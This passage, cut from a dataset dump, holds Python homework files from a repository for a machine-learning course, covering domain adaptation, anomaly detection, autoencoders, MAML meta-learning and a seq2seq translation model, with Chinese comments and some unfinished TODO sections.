file=f)\r\n\r\n return train_losses, val_losses, bleu_scores\r\n\r\n\r\nif __name__ == '__main__':\r\n config = configurations()\r\n print('config:\\n', vars(config))\r\n train_losses, val_losses, bleu_scores = train_process(config)\r\n\r\n plt.figure()\r\n plt.plot(train_losses)\r\n plt.xlabel('steps')\r\n plt.ylabel('loss')\r\n plt.title('train loss')\r\n plt.show()\r\n\r\n plt.figure()\r\n plt.plot(val_losses)\r\n plt.xlabel('steps')\r\n plt.ylabel('loss')\r\n plt.title('validation loss')\r\n plt.show()\r\n\r\n plt.figure()\r\n plt.plot(bleu_scores)\r\n plt.xlabel('steps')\r\n plt.ylabel('BLEU score')\r\n plt.title('BLEU score')\r\n plt.show()\r\n\r\n"
},
{
"alpha_fraction": 0.6327048540115356,
"alphanum_fraction": 0.6488397121429443,
"avg_line_length": 39.787879943847656,
"blob_id": "b867e5564947b2c682fcadeb155a9a96eac4b587",
"content_id": "032afb1eb08c771d99d21765e69a1f57b2c90cb7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6214,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 132,
"path": "/hw12_domain_adaptation/train.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n如何實作DaNN?\r\n理論上,在原始paper中是加上Gradient Reversal Layer,並將Feature Extractor / Label Predictor / Domain Classifier 一起train,\r\n但其實我們也可以交換的train Domain Classfier & Feature Extractor(就像在train GAN的Generator & Discriminator一樣),這也是可行的。\r\n在code實現中,我們採取後者的方式,畢竟大家上個作業就是GAN,應該會比較熟悉:)。\r\n小提醒:\r\n原文中的lambda(控制Domain Adversarial Loss的係數)是有Adaptive的版本,如果有興趣可以參考原文。以下為了方便固定設置0.1。\r\n因為我們完全沒有target的label,所以結果如何,只好丟kaggle看看囉:)?\r\n\"\"\"\r\nimport torch\r\nfrom hw12_domain_adaptation.model import FeatureExtractor, LabelPredictor, DomainClassifier\r\nfrom torch import nn, optim\r\nimport cv2\r\nimport numpy as np\r\nimport torchvision.transforms as transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision.datasets import ImageFolder\r\n\r\n\r\ndef train_epoch(source_dataloader, target_dataloader, lamb):\r\n '''\r\n Args:\r\n source_dataloader: source data的dataloader\r\n target_dataloader: target data的dataloader\r\n lamb: 調控adversarial的loss係數。\r\n '''\r\n\r\n # D loss: Domain Classifier的loss\r\n # F loss: Feature Extrator & Label Predictor的loss\r\n # total_hit: 計算目前對了幾筆 total_num: 目前經過了幾筆\r\n running_D_loss, running_F_loss = 0.0, 0.0\r\n total_hit, total_num = 0.0, 0.0\r\n\r\n for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):\r\n source_data = source_data.cuda()\r\n source_label = source_label.cuda()\r\n target_data = target_data.cuda()\r\n\r\n # 我們把source data和target data混在一起,否則batch_norm可能會算錯 (兩邊的data的mean/var不太一樣)\r\n mixed_data = torch.cat([source_data, target_data], dim=0)\r\n domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()\r\n # 設定source data的label為1\r\n domain_label[:source_data.shape[0]] = 1\r\n\r\n # Step 1 : 訓練Domain Classifier\r\n feature = feature_extractor(mixed_data)\r\n # 因為我們在Step 1不需要訓練Feature Extractor,所以把feature detach避免loss backprop上去。\r\n domain_logits = domain_classifier(feature.detach())\r\n loss = domain_criterion(domain_logits, domain_label)\r\n running_D_loss += loss.item()\r\n loss.backward()\r\n optimizer_D.step()\r\n\r\n # Step 2 : 訓練Feature Extractor和Domain Classifier\r\n class_logits = label_predictor(feature[:source_data.shape[0]])\r\n domain_logits = domain_classifier(feature)\r\n # loss為原本的class CE - lamb * domain BCE,相減的原因同GAN中的Discriminator中的G loss。\r\n loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)\r\n running_F_loss += loss.item()\r\n loss.backward()\r\n optimizer_F.step()\r\n optimizer_C.step()\r\n\r\n optimizer_D.zero_grad()\r\n optimizer_F.zero_grad()\r\n optimizer_C.zero_grad()\r\n\r\n total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()\r\n total_num += source_data.shape[0]\r\n print(i, end='\\r')\r\n\r\n return running_D_loss / (i + 1), running_F_loss / (i + 1), total_hit / total_num\r\n\r\n\r\nif __name__ == '__main__':\r\n \"\"\"------数据预处理------\"\"\"\r\n source_transform = transforms.Compose([\r\n # 轉灰階: Canny 不吃 RGB。\r\n transforms.Grayscale(),\r\n # cv2 不吃 skimage.Image,因此轉成np.array後再做cv2.Canny\r\n transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)),\r\n # 重新將np.array 轉回 skimage.Image\r\n transforms.ToPILImage(),\r\n # 水平翻轉 (Augmentation)\r\n transforms.RandomHorizontalFlip(),\r\n # 旋轉15度內 (Augmentation),旋轉後空的地方補0\r\n transforms.RandomRotation(15, fill=(0,)),\r\n # 最後轉成Tensor供model使用。\r\n transforms.ToTensor(),\r\n ])\r\n target_transform = transforms.Compose([\r\n # 轉灰階: 將輸入3維壓成1維。\r\n transforms.Grayscale(),\r\n # 縮放: 因為source 
data是32x32,我們將target data的28x28放大成32x32。\r\n transforms.Resize((32, 32)),\r\n # 水平翻轉 (Augmentation)\r\n transforms.RandomHorizontalFlip(),\r\n # 旋轉15度內 (Augmentation),旋轉後空的地方補0\r\n transforms.RandomRotation(15, fill=(0,)),\r\n # 最後轉成Tensor供model使用。\r\n transforms.ToTensor(),\r\n ])\r\n\r\n source_dataset = ImageFolder('./real_or_drawing/train_data', transform=source_transform)\r\n target_dataset = ImageFolder('./real_or_drawing/test_data', transform=target_transform)\r\n\r\n source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)\r\n target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)\r\n test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)\r\n\r\n # Pre-processing\r\n # 這裡我們選用Adam來當Optimizer。\r\n feature_extractor = FeatureExtractor().cuda()\r\n label_predictor = LabelPredictor().cuda()\r\n domain_classifier = DomainClassifier().cuda()\r\n\r\n class_criterion = nn.CrossEntropyLoss()\r\n domain_criterion = nn.BCEWithLogitsLoss()\r\n\r\n optimizer_F = optim.Adam(feature_extractor.parameters())\r\n optimizer_C = optim.Adam(label_predictor.parameters())\r\n optimizer_D = optim.Adam(domain_classifier.parameters())\r\n\r\n # 訓練200 epochs\r\n for epoch in range(200):\r\n train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)\r\n\r\n torch.save(feature_extractor.state_dict(), 'extractor_model.bin')\r\n torch.save(label_predictor.state_dict(), 'predictor_model.bin')\r\n\r\n print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss,\r\n train_F_loss, train_acc))\r\n"
},
{
"alpha_fraction": 0.6060606241226196,
"alphanum_fraction": 0.6159960031509399,
"avg_line_length": 37.47058868408203,
"blob_id": "075c5de904f9f7a4840bc47f2216b177aa9ca58f",
"content_id": "2c7c0f4463f236c81efd4e2c434001665dbfe42a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2229,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 51,
"path": "/hw10_anomaly_detection/data.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nfrom sklearn.cluster import MiniBatchKMeans\r\nfrom sklearn.metrics import f1_score, pairwise_distances, roc_auc_score\r\nfrom scipy.cluster.vq import vq, kmeans\r\nfrom sklearn.decomposition import PCA\r\n\r\n\"\"\"\r\n這份作業要執行的task是semi-supervised anomaly detection,\r\n也就是說training set是乾淨的,testing的時候才會混進outlier data(anomaly)。 \r\n我們以某個簡單的image dataset(image加上他們的label(分類))作為示範,\r\ntraining data為原先training set中的某幾類,而testing data則是原先testing set的所有data,\r\n要偵測的anomaly為training data中未出現的類別。label的部分,1為outlier data,而0為inlier data(相對於 outlier)。\r\n正確率以AUC計算。 方法則列舉3種: KNN, PCA, Autoencoder\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n train = np.load('./train.npy', allow_pickle=True)\r\n test = np.load('./test.npy', allow_pickle=True)\r\n\r\n task = 'pca'\r\n\r\n if task == 'knn':\r\n x = train.reshape(len(train), -1)\r\n y = test.reshape(len(test), -1)\r\n scores = list()\r\n for n in range(1, 10):\r\n kmeans_x = MiniBatchKMeans(n_clusters=n, batch_size=100).fit(x)\r\n y_cluster = kmeans_x.predict(y)\r\n y_dist = np.sum(np.square(kmeans_x.cluster_centers_[y_cluster] - y), axis=1)\r\n\r\n y_pred = y_dist\r\n # score = f1_score(y_label, y_pred, average='micro')\r\n # score = roc_auc_score(y_label, y_pred, average='micro')\r\n # scores.append(score)\r\n # print(np.max(scores), np.argmax(scores))\r\n # print(scores)\r\n # print('auc score: {}'.format(np.max(scores)))\r\n\r\n if task == 'pca':\r\n x = train.reshape(len(train), -1)\r\n y = test.reshape(len(test), -1)\r\n pca = PCA(n_components=2).fit(x)\r\n\r\n y_projected = pca.transform(y)\r\n y_reconstructed = pca.inverse_transform(y_projected)\r\n dist = np.sqrt(np.sum(np.square(y_reconstructed - y).reshape(len(y), -1), axis=1))\r\n\r\n y_pred = dist\r\n # score = roc_auc_score(y_label, y_pred, average='micro')\r\n # score = f1_score(y_label, y_pred, average='micro')\r\n # print('auc score: {}'.format(score))\r\n"
},
{
"alpha_fraction": 0.5449070334434509,
"alphanum_fraction": 0.573972225189209,
"avg_line_length": 29.561983108520508,
"blob_id": "5c5447b23dd433de83dfa13b279e7284ed2524d8",
"content_id": "c9da94cbe36a612909df266568fee4072ed02c5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4067,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 121,
"path": "/hw9_unsupervised/unsupervised.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nfrom torch.utils.data import Dataset\r\nfrom torch.utils.data import DataLoader\r\nimport random\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch import optim\r\n\r\n\r\ndef preprocess(image_list): # 將圖片的數值介於 0~255 的 int 線性轉為 0~1 的 float。\r\n \"\"\" Normalize Image and Permute (N,H,W,C) to (N,C,H,W)\r\n Args:\r\n image_list: List of images (9000, 32, 32, 3)\r\n Returns:\r\n image_list: List of images (9000, 3, 32, 32)\r\n \"\"\"\r\n image_list = np.array(image_list)\r\n image_list = np.transpose(image_list, (0, 3, 1, 2))\r\n image_list = (image_list / 255.0) * 2 - 1\r\n image_list = image_list.astype(np.float32)\r\n return image_list\r\n\r\n\r\nclass Image_Dataset(Dataset):\r\n def __init__(self, image_list):\r\n self.image_list = image_list\r\n def __len__(self):\r\n return len(self.image_list)\r\n def __getitem__(self, idx):\r\n images = self.image_list[idx]\r\n return images\r\n\r\n\r\ndef count_parameters(model, only_trainable=False): # 計算 model 參數量的(report 會用到)\r\n if only_trainable:\r\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\r\n else:\r\n return sum(p.numel() for p in model.parameters())\r\n\r\n\r\ndef same_seeds(seed): # 固定訓練的隨機種子(以便 reproduce)\r\n torch.manual_seed(seed)\r\n if torch.cuda.is_available():\r\n torch.cuda.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\r\n np.random.seed(seed) # Numpy module.\r\n random.seed(seed) # Python random module.\r\n #torch.backends.cudnn.benchmark = False\r\n #torch.backends.cudnn.deterministic = True\r\n\r\n\r\nclass AE(nn.Module): # 定義我們的 baseline autoeocoder\r\n def __init__(self):\r\n super(AE, self).__init__()\r\n\r\n self.encoder = nn.Sequential(\r\n nn.Conv2d(3, 64, 3, stride=1, padding=1),\r\n nn.ReLU(True),\r\n nn.MaxPool2d(2),\r\n nn.Conv2d(64, 128, 3, stride=1, padding=1),\r\n nn.ReLU(True),\r\n nn.MaxPool2d(2),\r\n nn.Conv2d(128, 256, 3, stride=1, padding=1),\r\n nn.ReLU(True),\r\n nn.MaxPool2d(2)\r\n )\r\n\r\n self.decoder = nn.Sequential(\r\n nn.ConvTranspose2d(256, 128, 5, stride=1),\r\n nn.ReLU(True),\r\n nn.ConvTranspose2d(128, 64, 9, stride=1),\r\n nn.ReLU(True),\r\n nn.ConvTranspose2d(64, 3, 17, stride=1),\r\n nn.Tanh()\r\n )\r\n\r\n def forward(self, x):\r\n x1 = self.encoder(x)\r\n x = self.decoder(x1)\r\n return x1, x\r\n\r\n\r\nif __name__ == '__main__':\r\n trainX = np.load('./trainX_new.npy')\r\n trainX_preprocessed = preprocess(trainX)\r\n img_dataset = Image_Dataset(trainX_preprocessed)\r\n \"\"\"\r\n 這個部分就是主要的訓練階段。 我們先將準備好的 dataset 當作參數餵給 dataloader。 \r\n 將 dataloader、model、loss criterion、optimizer 都準備好之後,就可以開始訓練。 \r\n 訓練完成後,我們會將 model 存下來。\r\n \"\"\"\r\n model = AE()\r\n criterion = nn.MSELoss()\r\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-5, weight_decay=1e-5)\r\n\r\n model.train()\r\n n_epoch = 10\r\n\r\n same_seeds(0)\r\n # 準備 dataloader, model, loss criterion 和 optimizer\r\n img_dataloader = DataLoader(img_dataset, batch_size=8, shuffle=True)\r\n\r\n # 主要的訓練過程\r\n for epoch in range(n_epoch):\r\n for data in img_dataloader:\r\n img = data\r\n img = img\r\n\r\n output1, output = model(img)\r\n loss = criterion(output, img)\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n if (epoch + 1) % 10 == 0:\r\n torch.save(model.state_dict(), './checkpoints/checkpoint_{}.pth'.format(epoch + 1))\r\n\r\n print('epoch [{}/{}], loss:{:.5f}'.format(epoch + 1, n_epoch, loss.data))\r\n\r\n # 訓練完成後儲存 model\r\n torch.save(model.state_dict(), './checkpoints/last_checkpoint.pth')\r\n"
},
{
"alpha_fraction": 0.5405536890029907,
"alphanum_fraction": 0.5529383420944214,
"avg_line_length": 41.787235260009766,
"blob_id": "eab27b3a20dddcc895cff7db7e25fb2d5a2fb7b3",
"content_id": "e731953bcbdcce27a1d4d8dffe4101c87c946265",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4310,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 94,
"path": "/hw13_meta_learning/train.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader\r\nfrom tqdm import tqdm\r\nfrom hw13_meta.data import Omniglot\r\nfrom hw13_meta.model import Classifier, MAML\r\nimport numpy as np\r\n\r\n\r\ndef get_meta_batch(meta_batch_size, k_shot, q_query, data_loader, iterator):\r\n data = []\r\n for _ in range(meta_batch_size):\r\n try:\r\n task_data = iterator.next() # 一筆 task_data 就是一個 task 裡面的 data,大小是 [n_way, k_shot+q_query, 1, 28, 28]\r\n except StopIteration:\r\n iterator = iter(data_loader)\r\n task_data = iterator.next()\r\n train_data = task_data[:, :k_shot].reshape(-1, 1, 28, 28)\r\n val_data = task_data[:, k_shot:].reshape(-1, 1, 28, 28)\r\n task_data = torch.cat((train_data, val_data), 0)\r\n data.append(task_data)\r\n return torch.stack(data).cuda(), iterator\r\n\r\n\r\nif __name__ == '__main__':\r\n n_way = 5\r\n k_shot = 1\r\n q_query = 1\r\n inner_train_steps = 1\r\n inner_lr = 0.4\r\n meta_lr = 0.001\r\n meta_batch_size = 32\r\n max_epoch = 40\r\n eval_batches = test_batches = 20\r\n train_data_path = './Omniglot/images_background/'\r\n test_data_path = './Omniglot/images_evaluation/'\r\n\r\n dataset = Omniglot(train_data_path, k_shot, q_query)\r\n train_set, val_set = torch.utils.data.random_split(Omniglot(train_data_path, k_shot, q_query), [3200, 656])\r\n train_loader = DataLoader(train_set,\r\n batch_size=n_way, # 這裡的 batch size 並不是 meta batch size, 而是一個 task裡面會有多少不同的\r\n # characters,也就是 few-shot classifiecation 的 n_way\r\n num_workers=8,\r\n shuffle=True,\r\n drop_last=True)\r\n val_loader = DataLoader(val_set,\r\n batch_size=n_way,\r\n num_workers=8,\r\n shuffle=True,\r\n drop_last=True)\r\n test_loader = DataLoader(Omniglot(test_data_path, k_shot, q_query),\r\n batch_size=n_way,\r\n num_workers=8,\r\n shuffle=True,\r\n drop_last=True)\r\n train_iter = iter(train_loader)\r\n val_iter = iter(val_loader)\r\n test_iter = iter(test_loader)\r\n\r\n meta_model = Classifier(1, n_way).cuda()\r\n optimizer = torch.optim.Adam(meta_model.parameters(), lr=meta_lr)\r\n loss_fn = nn.CrossEntropyLoss().cuda()\r\n\r\n # 开始训练\r\n for epoch in range(max_epoch):\r\n print(\"Epoch %d\" % (epoch))\r\n train_meta_loss = []\r\n train_acc = []\r\n for step in tqdm(range(len(train_loader) // (meta_batch_size))): # 這裡的 step 是一次 meta-gradinet update step\r\n x, train_iter = get_meta_batch(meta_batch_size, k_shot, q_query, train_loader, train_iter)\r\n meta_loss, acc = MAML(meta_model, optimizer, x, n_way, k_shot, q_query, loss_fn)\r\n train_meta_loss.append(meta_loss.item())\r\n train_acc.append(acc)\r\n print(\" Loss : \", np.mean(train_meta_loss))\r\n print(\" Accuracy: \", np.mean(train_acc))\r\n\r\n # 每個 epoch 結束後,看看 validation accuracy 如何\r\n # 助教並沒有做 early stopping,同學如果覺得有需要是可以做的\r\n val_acc = []\r\n for eval_step in tqdm(range(len(val_loader) // (eval_batches))):\r\n x, val_iter = get_meta_batch(eval_batches, k_shot, q_query, val_loader, val_iter)\r\n _, acc = MAML(meta_model, optimizer, x, n_way, k_shot, q_query, loss_fn, inner_train_step=3,\r\n train=False) # testing時,我們更新三次 inner-step\r\n val_acc.append(acc)\r\n print(\" Validation accuracy: \", np.mean(val_acc))\r\n\r\n # 测试\r\n test_acc = []\r\n for test_step in tqdm(range(len(test_loader) // (test_batches))):\r\n x, val_iter = get_meta_batch(test_batches, k_shot, q_query, test_loader, test_iter)\r\n _, acc = MAML(meta_model, optimizer, x, n_way, k_shot, q_query, loss_fn, inner_train_step=3,\r\n train=False) # testing時,我們更新三次 inner-step\r\n test_acc.append(acc)\r\n print(\" Testing accuracy: \", 
np.mean(test_acc))\r\n\r\n"
},
{
"alpha_fraction": 0.6576673984527588,
"alphanum_fraction": 0.6598272323608398,
"avg_line_length": 33.61538314819336,
"blob_id": "731a4cec75b9fb10ce026e5c9bcbdd76d1f5ece9",
"content_id": "7fc0f580f87cb45a16031807498d0c16e868c854",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 966,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 26,
"path": "/hw13_meta_learning/data.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import glob\r\nimport numpy as np\r\nimport torch\r\nfrom PIL.Image import Image\r\nfrom torch.utils.data import Dataset\r\nfrom torchvision.transforms import transforms\r\n\r\n\r\nclass Omniglot(Dataset):\r\n def __init__(self, data_dir, k_way, q_query):\r\n self.file_list = [f for f in glob.glob(data_dir + \"**/character*\", recursive=True)]\r\n self.transform = transforms.Compose([transforms.ToTensor()])\r\n self.n = k_way + q_query\r\n\r\n def __getitem__(self, idx):\r\n sample = np.arange(20)\r\n np.random.shuffle(sample) # 這裡是為了等一下要 random sample 出我們要的 character\r\n img_path = self.file_list[idx]\r\n img_list = [f for f in glob.glob(img_path + \"**/*.png\", recursive=True)]\r\n img_list.sort()\r\n imgs = [self.transform(Image.open(img_file)) for img_file in img_list]\r\n imgs = torch.stack(imgs)[sample[:self.n]] # 每個 character,取出 k_way + q_query 個\r\n return imgs\r\n\r\n def __len__(self):\r\n return len(self.file_list)\r\n"
},
{
"alpha_fraction": 0.5838926434516907,
"alphanum_fraction": 0.5906040072441101,
"avg_line_length": 37.44117736816406,
"blob_id": "82dc8573e217f32b46cc05c95f0388c124122797",
"content_id": "7c569e7ee3e6dfa9dcac2afd8eefa1f6c53e4d10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1375,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 34,
"path": "/hw4RNN/predict.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# Predict and Write to csv file\r\nimport os\r\n\r\nimport pandas as pd\r\nimport torch\r\nfrom hw4RNN.data import TwitterDataset\r\nfrom hw4RNN.preprocess import Preprocess\r\nfrom hw4RNN.test import testing\r\nfrom hw4RNN.utils import load_testing_data\r\n\r\n\r\nif __name__ == '__main__':\r\n path_prefix = './'\r\n model_dir = './'\r\n # 開始測試模型並做預測\r\n print(\"loading testing data ...\")\r\n test_x = load_testing_data(path='../hw4_data/testing_data.txt')\r\n preprocess = Preprocess(test_x, sen_len, w2v_path=\"./w2v.model\")\r\n embedding = preprocess.make_embedding(load=True)\r\n test_x = preprocess.sentence_word2idx()\r\n test_dataset = TwitterDataset(X=test_x, y=None)\r\n test_loader = torch.utils.data.DataLoader(dataset = test_dataset,\r\n batch_size = batch_size,\r\n shuffle = False,\r\n num_workers = 8)\r\n print('\\nload model ...')\r\n model = torch.load(os.path.join(model_dir, 'ckpt.model'))\r\n outputs = testing(batch_size, test_loader, model, device)\r\n\r\n # 寫到csv檔案供上傳kaggle\r\n tmp = pd.DataFrame({\"id\":[str(i) for i in range(len(test_x))],\"label\":outputs})\r\n print(\"save csv ...\")\r\n tmp.to_csv(os.path.join(path_prefix, 'predict.csv'), index=False)\r\n print(\"Finish Predicting\")\r\n"
},
{
"alpha_fraction": 0.626151442527771,
"alphanum_fraction": 0.6347649097442627,
"avg_line_length": 37.79523849487305,
"blob_id": "72a872b23bce243bb8886c675edf2ccd0f9204ec",
"content_id": "23fba5fcce5954a0f2f4cc54ab739b4700e7d2e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10497,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 210,
"path": "/hw8_seq2seq/model.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nfrom torch import nn, random\r\n\r\nfrom hw8_seq2seq import config\r\n\r\n'''\r\nseq2seq模型的編碼器為RNN。 對於每個輸入,Encoder 會輸出一個向量和一個隱藏狀態(hidden state),並將隱藏狀態用於下一個輸入,換句話說,Encoder 會逐步讀取輸入序列,並輸出單個矢量(最終隱藏狀態)\r\n參數:\r\nen_vocab_size 是英文字典的大小,也就是英文的 subword 的個數\r\nemb_dim 是 embedding 的維度,主要將 one-hot vector 的單詞向量壓縮到指定的維度,主要是為了降維和濃縮資訊的功用,可以使用預先訓練好的 word embedding,如 Glove 和 word2vector\r\nhid_dim 是 RNN 輸出和隱藏狀態的維度\r\nn_layers 是 RNN 要疊多少層\r\ndropout 是決定有多少的機率會將某個節點變為 0,主要是為了防止 overfitting ,一般來說是在訓練時使用,測試時則不使用\r\nEncoder 的輸入和輸出:\r\n輸入:\r\n英文的整數序列 e.g. 1, 28, 29, 205, 2\r\n輸出:\r\noutputs: 最上層 RNN 全部的輸出,可以用 Attention 再進行處理\r\nhidden: 每層最後的隱藏狀態,將傳遞到 Decoder 進行解碼\r\n'''\r\nclass Encoder(nn.Module):\r\n def __init__(self, en_vocab_size, emb_dim, hid_dim, n_layers, dropout):\r\n super().__init__()\r\n self.embedding = nn.Embedding(en_vocab_size, emb_dim)\r\n self.hid_dim = hid_dim\r\n self.n_layers = n_layers\r\n self.rnn = nn.GRU(emb_dim, hid_dim, n_layers, dropout=dropout, batch_first=True, bidirectional=True)\r\n self.dropout = nn.Dropout(dropout)\r\n\r\n def forward(self, input):\r\n # input = [batch size, sequence len, vocab size]\r\n embedding = self.embedding(input)\r\n outputs, hidden = self.rnn(self.dropout(embedding))\r\n # outputs = [batch size, sequence len, hid dim * directions]\r\n # hidden = [num_layers * directions, batch size , hid dim]\r\n # outputs 是最上層RNN的輸出\r\n\r\n return outputs, hidden\r\n\r\n\r\n'''\r\nDecoder 是另一個 RNN,在最簡單的 seq2seq decoder 中,僅使用 Encoder 每一層最後的隱藏狀態來進行解碼,\r\n而這最後的隱藏狀態有時被稱為 “content vector”,因為可以想像它對整個前文序列進行編碼, \r\n此 “content vector” 用作 Decoder 的初始隱藏狀態, 而 Encoder 的輸出通常用於 Attention Mechanism。\r\n\r\n參數:\r\nen_vocab_size:英文字典的大小,也就是英文的 subword 的個數\r\nemb_dim:embedding 的維度,是用來將 one-hot vector 的單詞向量壓縮到指定的維度,主要是為了降維和濃縮資訊的功用,可以使用預先訓練好的 word embedding,如 Glove 和 word2vector\r\nhid_dim:RNN 輸出和隱藏狀態的維度\r\noutput_dim:最終輸出的維度,一般來說是將 hid_dim 轉到 one-hot vector 的單詞向量\r\nn_layers:RNN 要疊多少層\r\ndropout:決定有多少的機率會將某個節點變為0,主要是為了防止 overfitting ,一般來說是在訓練時使用,測試時則不用\r\nisatt:是來決定是否使用 Attention Mechanism\r\n\r\nDecoder 的輸入和輸出:\r\n輸入:前一次解碼出來的單詞的整數表示\r\n輸出:\r\nhidden: 根據輸入和前一次的隱藏狀態,現在的隱藏狀態更新的結果\r\noutput: 每個字有多少機率是這次解碼的結果\r\n'''\r\nclass Decoder(nn.Module):\r\n def __init__(self, cn_vocab_size, emb_dim, hid_dim, n_layers, dropout, isatt):\r\n super().__init__()\r\n self.cn_vocab_size = cn_vocab_size\r\n self.hid_dim = hid_dim * 2\r\n self.n_layers = n_layers\r\n self.embedding = nn.Embedding(cn_vocab_size, config.emb_dim)\r\n self.isatt = isatt\r\n self.attention = Attention(hid_dim)\r\n # 如果使用 Attention Mechanism 會使得輸入維度變化,請在這裡修改\r\n # e.g. Attention 接在輸入後面會使得維度變化,所以輸入維度改為\r\n # self.input_dim = emb_dim + hid_dim * 2 if isatt else emb_dim\r\n self.input_dim = emb_dim\r\n self.rnn = nn.GRU(self.input_dim, self.hid_dim, self.n_layers, dropout = dropout, batch_first=True)\r\n self.embedding2vocab1 = nn.Linear(self.hid_dim, self.hid_dim * 2)\r\n self.embedding2vocab2 = nn.Linear(self.hid_dim * 2, self.hid_dim * 4)\r\n self.embedding2vocab3 = nn.Linear(self.hid_dim * 4, self.cn_vocab_size)\r\n self.dropout = nn.Dropout(dropout)\r\n\r\n def forward(self, input, hidden, encoder_outputs):\r\n # input = [batch size, vocab size]\r\n # hidden = [batch size, n layers * directions, hid dim]\r\n # Decoder 只會是單向,所以 directions=1\r\n input = input.unsqueeze(1)\r\n embedded = self.dropout(self.embedding(input))\r\n # embedded = [batch size, 1, emb dim]\r\n if self.isatt:\r\n attn = self.attention(encoder_outputs, hidden)\r\n # TODO: 在這裡決定如何使用 Attention,e.g. 
相加 或是 接在後面, 請注意維度變化\r\n output, hidden = self.rnn(embedded, hidden)\r\n # output = [batch size, 1, hid dim]\r\n # hidden = [num_layers, batch size, hid dim]\r\n\r\n # 將 RNN 的輸出轉為每個詞出現的機率\r\n output = self.embedding2vocab1(output.squeeze(1))\r\n output = self.embedding2vocab2(output)\r\n prediction = self.embedding2vocab3(output)\r\n # prediction = [batch size, vocab size]\r\n return prediction, hidden\r\n\r\n\r\n'''\r\n當輸入過長,或是單獨靠 “content vector” 無法取得整個輸入的意思時,用 Attention Mechanism 來提供 Decoder 更多的資訊。\r\n主要是根據現在 Decoder hidden state ,去計算在 Encoder outputs 中,那些與其有較高的關係,根據關系的數值來決定該傳給 Decoder 那些額外資訊。\r\n常見 Attention 的實作是用 Neural Network / Dot Product 來算 Decoder hidden state 和 Encoder outputs 之間的關係,\r\n再對所有算出來的數值做 softmax ,最後根據過完 softmax 的值對 Encoder outputs 做 weight sum。\r\nTODO: 實作 Attention Mechanism\r\n'''\r\nclass Attention(nn.Module):\r\n def __init__(self, hid_dim):\r\n super(Attention, self).__init__()\r\n self.hid_dim = hid_dim\r\n\r\n def forward(self, encoder_outputs, decoder_hidden):\r\n # encoder_outputs = [batch size, sequence len, hid dim * directions]\r\n # decoder_hidden = [num_layers, batch size, hid dim]\r\n # 一般來說是取最後一層的 hidden state 來做 attention\r\n ########\r\n # TODO #\r\n ########\r\n attention = None\r\n\r\n return attention\r\n\r\n\r\n'''\r\n由 Encoder 和 Decoder 組成\r\n接收輸入並傳給 Encoder\r\n將 Encoder 的輸出傳給 Decoder\r\n不斷地將 Decoder 的輸出傳回 Decoder ,進行解碼\r\n當解碼完成後,將 Decoder 的輸出傳回\r\n'''\r\nclass Seq2Seq(nn.Module):\r\n def __init__(self, encoder, decoder, device):\r\n super().__init__()\r\n self.encoder = encoder\r\n self.decoder = decoder\r\n self.device = device\r\n assert encoder.n_layers == decoder.n_layers, \\\r\n \"Encoder and decoder must have equal number of layers!\"\r\n\r\n def forward(self, input, target, teacher_forcing_ratio):\r\n # input = [batch size, input len, vocab size]\r\n # target = [batch size, target len, vocab size]\r\n # teacher_forcing_ratio 是有多少機率使用正確答案來訓練\r\n batch_size = target.shape[0]\r\n target_len = target.shape[1]\r\n vocab_size = self.decoder.cn_vocab_size\r\n\r\n # 準備一個儲存空間來儲存輸出\r\n outputs = torch.zeros(batch_size, target_len, vocab_size).to(self.device)\r\n # 將輸入放入 Encoder\r\n encoder_outputs, hidden = self.encoder(input)\r\n # Encoder 最後的隱藏層(hidden state) 用來初始化 Decoder\r\n # encoder_outputs 主要是使用在 Attention\r\n # 因為 Encoder 是雙向的RNN,所以需要將同一層兩個方向的 hidden state 接在一起\r\n # hidden = [num_layers * directions, batch size , hid dim] --> [num_layers, directions, batch size , hid dim]\r\n hidden = 